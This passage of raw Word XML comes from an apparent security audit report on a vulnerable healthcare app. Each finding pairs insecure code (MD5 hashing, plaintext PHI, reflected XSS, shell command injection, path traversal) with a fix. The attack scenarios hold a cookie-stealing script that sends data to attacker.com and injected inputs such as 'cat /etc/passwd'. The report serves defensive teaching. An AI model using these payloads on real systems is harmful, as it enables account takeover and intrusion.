        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7.5 (High) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]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B324:hashlib (Use of weak MD5 hash)</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vulnerable_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import hashlib</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def hash_password(password: str) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Unsalted, single-iteration MD5 - COMPLETELY OBSOLETE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return hashlib.md5(password.encode("utf-8")).hexdigest()</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MD5 suffers from known collision vulnerabilities and can be computed at billions of hashes per second on modern GPUs. Attackers use precomputed rainbow tables or brute-force engines (Hashcat) to crack passwords in seconds. Because no salt was used, identical passwords produce identical hashes across the user base.</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secure_app/crypto.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import hashlib, secrets</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def hash_password(password: str) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    salt = secrets.token_bytes(32)  # 256-bit cryptographically secure salt</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations=600_000)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return f"pbkdf2:sha256:600000${salt.hex()}${derived.hex()}"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def verify_password(stored_hash: str, candidate_password: str) -&gt; bool:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Uses hmac.compare_digest for constant-time comparison to prevent timing attacks (CWE-208)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return hmac.compare_digest(derived, expected_bytes)</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NIST SP 800-63B recommends PBKDF2 with at least 600,000 iterations or Argon2id. Unique 256-bit salts defeat rainbow tables, while constant-time comparison (hmac.compare_digest) eliminates timing side-channel leaks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-03: Plaintext Storage of Protected Health Information (PHI) &amp; Financial Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-312: Cleartext Storage of Sensitive Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A02:2021 – Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7.5 (High) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]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Identified via Architectural Security Audit</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vulnerable_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t># Direct unencrypted storage in SQLite columns</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cursor.execute("""</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CREATE TABLE patient_records (</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        id INTEGER PRIMARY KEY,</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        patient_name TEXT, ssn TEXT, diagnosis TEXT, credit_card TEXT</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>""")</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Any attacker gaining file-level read access, backup access, or executing a SQL injection exploit directly exfiltrates unencrypted patient SSNs, clinical diagnostic histories, and credit card numbers, resulting in catastrophic HIPAA civil penalties and patient harm.</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secure_app/crypto.py &amp; secure_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>from cryptography.fernet import Fernet</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def encrypt_field(plaintext: str) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Encrypts using AES-128-CBC + HMAC-SHA256 authenticated encryption (AEAD)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    f = Fernet(ENCRYPTION_KEY.encode("utf-8"))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return f.encrypt(plaintext.encode("utf-8")).decode("utf-8")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t># Stored encrypted in columns: ssn_encrypted, diagnosis_encrypted, credit_card_encrypted</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HIPAA 45 CFR § 164.312(a)(2)(iv) and PCI-DSS Requirement 3 mandate encryption of cardholder data and PHI at rest. Fernet provides authenticated symmetric encryption that detects unauthorized database tampering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-04: Cross-Site Scripting (XSS) via Unescaped Reflection in HTML Templates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A03:2021 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6.1 (Medium) [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]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Identified via Manual Code Audit &amp; Attack Simulation</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vulnerable_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.route("/search")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def search():</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    q = request.args.get("q", "")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Direct string reflection into HTML response - SEVERE REFLECTED XSS</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    html = f"&lt;html&gt;&lt;body&gt;&lt;h2&gt;Search Results for: {q}&lt;/h2&gt;&lt;/body&gt;&lt;/html&gt;"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return html</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 attacker tricks a hospital employee into clicking a crafted link containing: &lt;script&gt;fetch('http://attacker.com/steal?c='+document.cookie)&lt;/script&gt;. The browser executes the payload, allowing the attacker to hijack clinical staff session cookies and take over patient management accounts.</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secure_app/validator.py &amp; secure_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import html</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def sanitize_xss(input_val: str) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Context-aware HTML entity encoding</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return html.escape(str(input_val).strip(), quote=True)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t># In addition: Content-Security-Policy (CSP) headers block inline script execution</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Applying context-aware entity encoding converts dangerous characters (&lt;, &gt;, ", ', &amp;) into harmless HTML entities (&amp;lt;, &amp;gt;, etc.), preventing the browser's DOM parser from treating user input as executable markup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-05: OS Command Injection in Network Diagnostic Utilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A03:2021 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>9.8 (Critical) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]</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B602:subprocess_popen_with_shell_equals_true</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vulnerable_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.route("/api/ping")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def ping():</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    host = request.args.get("host", "127.0.0.1")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Executes system command with shell=True and unsanitized input</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    cmd = f"ping -c 1 {host}"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    output = subprocess.check_output(cmd, shell=True)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return output</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 attacker passes host = 127.0.0.1 &amp;&amp; whoami or 127.0.0.1; cat /etc/passwd. The operating system shell executes the chained command with the privileges of the web application service, yielding full Remote Code Execution (RCE).</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secure_app/app.py &amp; secure_app/validator.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import socket</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def check_network_host(host_val: str, port: int = 80) -&gt; bool:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Strict IPv4 / FQDN regex validation</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    validate_host(host_val)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Zero shell subprocess invocation: uses native Python socket connection</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    with socket.create_connection((host_val, port), timeout=2.0):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return True</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The most robust defense against command injection is complete avoidance of OS subprocesses. Replacing external ping commands with native Python socket handshakes eliminates the command injection attack surface entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-06: Directory Path Traversal in Document Retrieval Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A01:2021 – Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7.5 (High) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]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Identified via Manual Code Audit &amp; Attack Simulation</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vulnerable_app/storage.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def get_report_file(filename: str):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Naive path concatenation without containment check</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
